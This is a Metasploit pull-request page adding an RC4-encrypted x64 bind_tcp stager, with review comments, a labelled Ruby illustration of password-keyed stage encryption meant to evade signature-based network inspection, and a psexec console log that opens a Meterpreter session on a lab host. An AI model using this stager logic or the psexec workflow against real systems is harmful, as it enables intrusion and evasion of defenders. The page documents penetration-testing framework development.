
Implement bind TCP with RC4 decryption for x64 #11944

Merged: 2 commits merged into rapid7:master on Jun 13, 2019

@sempervictus (Contributor) commented Jun 3, 2019

Update metasm generated shellcode blocks to cobble together an
RC4 decryption routine with a bind-socket handler for x64 targets.
Expose via new payload module
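How the password-keyed stage exchange that this kind of stager performs fits together, as an added example that is not code from PR #11944 or from Metasploit itself: the handler derives keys from RC4PASSWORD, encrypts the stage and sends a length header plus ciphertext through the bind socket; the stager derives the same keys and decrypts the stage before jumping into it. The module name `Rc4Stager`, the helpers `derive_keys`, `encode_stage` and `decode_stage`, the key derivation (SHA-1 of the password split into a 4-byte XOR mask for the length header and a 16-byte RC4 key) and the wire format are all assumptions chosen for illustration; the framework's own scheme lives in its rc4 payload mixins and should be read there. The RC4 routine is the textbook KSA/PRGA, which is exactly what the metasm-generated decryption block has to reproduce in x64 assembly.

```ruby
require 'digest'

# Added example, not code from PR #11944 or from Metasploit.
# Models a password-keyed RC4 bind stager end to end in plain Ruby.
# ASSUMPTION: key derivation and wire format below are illustrative,
# not necessarily what the framework's rc4 mixins do.
module Rc4Stager
  module_function

  # Derive [xor_mask (4 bytes), rc4_key (16 bytes)] from the shared password.
  # ASSUMPTION: SHA-1 split; check the framework for its real derivation.
  def derive_keys(password)
    digest = Digest::SHA1.digest(password)
    [digest[0, 4], digest[4, 16]]
  end

  # Textbook RC4: key scheduling (KSA) followed by keystream generation (PRGA).
  # The cipher is a keystream XOR, so one routine both encrypts and decrypts.
  def rc4(key, data)
    s = (0..255).to_a
    kb = key.bytes
    j = 0
    256.times do |i|
      j = (j + s[i] + kb[i % kb.size]) & 0xff
      s[i], s[j] = s[j], s[i]
    end
    i = j = 0
    out = data.bytes.map do |byte|
      i = (i + 1) & 0xff
      j = (j + s[i]) & 0xff
      s[i], s[j] = s[j], s[i]
      byte ^ s[(s[i] + s[j]) & 0xff]
    end
    out.pack('C*')
  end

  # Handler side: bytes sent after the stager's accept() returns.
  # ASSUMED wire format: 4-byte little-endian stage length XORed with the
  # mask, followed by the RC4-encrypted stage.
  def encode_stage(password, stage)
    xor_mask, rc4_key = derive_keys(password)
    masked_len = [stage.bytesize ^ xor_mask.unpack1('V')].pack('V')
    masked_len + rc4(rc4_key, stage)
  end

  # Stager side: what the in-shellcode decryption routine has to do.
  # Returns the plaintext stage, or nil when the unmasked length does not
  # match the bytes received (a wrong password yields a garbage length).
  def decode_stage(password, blob)
    return nil if blob.bytesize < 4
    xor_mask, rc4_key = derive_keys(password)
    length = blob.byteslice(0, 4).unpack1('V') ^ xor_mask.unpack1('V')
    body = blob.byteslice(4, blob.bytesize - 4)
    return nil unless length == body.bytesize
    rc4(rc4_key, body)
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample "stage": a NOP sled plus a marker, not a real stage.
  stage = ("\x90".b * 8) + 'constructed stage body'.b
  blob = Rc4Stager.encode_stage('secret', stage)
  puts "on the wire: #{blob.unpack1('H*')}"
  puts "decrypted:   #{Rc4Stager.decode_stage('secret', blob).inspect}"
  puts "wrong pass:  #{Rc4Stager.decode_stage('wrong', blob).inspect}"
end
```

Everything after the 4-byte header is keystream-XORed, which is why a capture of the staged session (like the one pasted later in this thread) shows nothing recognisable. Note the limits of the construction: RC4 under a static password-derived key provides no integrity and RC4 itself is a broken cipher, so the value here is hiding the stage from signature-based inspection on the wire, not confidentiality against an observer who can recover or guess RC4PASSWORD.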

Commit by RageLtMan: Implement bind TCP with RC4 decryption for x64
Update metasm generated shellcode blocks to cobble together an
RC4 decryption routine with a bind-socket handler for x64 targets.
Expose via new payload module
@sempervictus (Contributor, Author) commented Jun 3, 2019

Bah, already in cab to airport. If someone could please update cached sizes, would greatly appreciate it (usual problem, even if I did run it, the sizes don't match between fork and master, so I'd need to create a gemset for master-branch-instance just to run the tool in the correct context).
Ping @acammack-r7

Review thread on this snippet from the diff:

return asm
end

def asm_block_recv(opts={})

asm << %Q^

@bwatters-r7 (Contributor) commented on this snippet, Jun 4, 2019:

Since you encapsulated this in the method, you'll need this to change to asm = %Q^
Pretty sure that's why sanity tests are failing on meterpreter/bind_tcp.

@bwatters-r7 (Contributor) commented Jun 4, 2019

I'd already fixed it locally to check, so feel free to take or ignore this: sempervictus#26

@bwatters-r7 (Contributor) commented Jun 4, 2019

@sempervictus other than the two catches noted, this looks good to me. Let me know if you just want me to push the fixed branch here and land it.

msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.134.120  yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               [redacted]          no        The password for the specified username
   SMBUser               [redacted]          no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT        4567             yes       The listen port
   RC4PASSWORD  secret           yes       Password to derive RC4 key from
   RHOST        192.168.134.120  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > run

[*] 192.168.134.120:445 - Connecting to the server...
[*] 192.168.134.120:445 - Authenticating to 192.168.134.120:445 as user '[redacted]'...
[!] 192.168.134.120:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.120:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.120:445 - PowerShell found
[*] 192.168.134.120:445 - Selecting PowerShell target
[*] 192.168.134.120:445 - Powershell command length: 2748
[*] 192.168.134.120:445 - Executing the payload...
[*] 192.168.134.120:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[\svcctl] ...
[*] 192.168.134.120:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[\svcctl] ...
[*] 192.168.134.120:445 - Obtaining a service manager handle...
[*] 192.168.134.120:445 - Creating the service...
[+] 192.168.134.120:445 - Successfully created the service
[*] 192.168.134.120:445 - Starting the service...
[+] 192.168.134.120:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.120:445 - Removing the service...
[+] 192.168.134.120:445 - Successfully removed the service
[*] 192.168.134.120:445 - Closing service handle...
[*] Started bind TCP handler against 192.168.134.120:4567
[-] The connection was refused by the remote host (192.168.134.120:4567).
[*] Sending stage (206407 bytes) to 192.168.134.120
[*] Meterpreter session 4 opened (192.168.135.168:43744 -> 192.168.134.120:4567) at 2019-06-04 16:50:29 -0500

Pcap:

[capture of the staged session: the bytes on the wire are RC4 ciphertext with no recognisable structure; the raw dump is omitted here]

@bwatters-r7 bwatters-r7 self-assigned this Jun 4, 2019

@bwatters-r7 bwatters-r7 merged commit bee013a into rapid7:master Jun 13, 2019

3 checks passed:
- Metasploit Automation - Sanity Test Execution: successfully completed all tests
- Metasploit Automation - Test Execution: successfully completed all tests
- continuous-integration/travis-ci/pr: the Travis CI build passed

bwatters-r7 added a commit that referenced this pull request Jun 13, 2019

Land #11944, Implement bind TCP with RC4 decryption for x64
Merge branch 'land-11944' into upstream-master
@bwatters-r7 (Contributor) commented Jun 13, 2019

Release Notes

A new RC4 encrypted bind_tcp stager has been added for Windows x64.

msjenkins-r7 added a commit that referenced this pull request Jun 13, 2019

Land #11944, Implement bind TCP with RC4 decryption for x64
Merge branch 'land-11944' into upstream-master
@h00die (Contributor) commented Jun 13, 2019

This is most excellent, just pinged @sempervictus yesterday about this being missing
